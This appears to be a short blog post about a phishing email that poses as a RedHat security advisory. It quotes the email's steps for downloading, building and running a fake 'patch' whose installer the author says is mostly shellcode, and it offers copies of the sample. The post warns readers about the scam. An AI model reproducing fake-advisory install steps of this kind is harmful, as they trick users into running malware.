Nice spoof

I just got a nice RedHat security advisory email spoof, subject: “RedHat: Buffer Overflow in "ls" and "mkdir"”.

The content was text/html, but the thing that really gave it away, before I started looking in the headers, was this part:

  • First download the patch from the Stanford RedHat mirror: wget
  • Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Thank you very much…

Anyone following these directions deserve what they get. I took a quick look at the code in the inst.c file, which is in the fileutils-1.0.6.patch.tar.gz tarball, and it's mostly shellcode as expected. I have no idea what it does, but it's probably not benign.

I have fileutils-1.0.6.patch.tar.gz and the original email if you want copies, just mail me.